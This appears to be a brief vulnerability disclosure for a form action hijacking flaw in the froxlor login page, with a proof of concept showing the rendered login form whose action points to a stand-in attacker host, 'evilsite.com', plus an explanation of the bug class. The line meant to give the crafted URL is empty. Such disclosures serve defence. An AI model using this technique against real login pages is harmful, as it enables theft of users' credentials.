External Control of File Name or Path in froxlor/froxlor
Aug 25th 2021
The login form POST request can be hijacked so that the credentials will be sent to an external website, by modifying the login page URL.
🕵️♂️ Proof of Concept
Change the login page URL to
Then the form action in the webpage will be changed to
<section class="loginsec"> <form method="post" action="evilsite.com" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="script" value="" /> <input type="hidden" name="qrystr" value="" />
Form action hijacking vulnerabilities arise when an application places user-supplied input into the action URL of an HTML form. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify the action URL of a form to point to the attacker's server. If a user submits the form then its contents, including any input from the victim user, will be delivered directly to the attacker.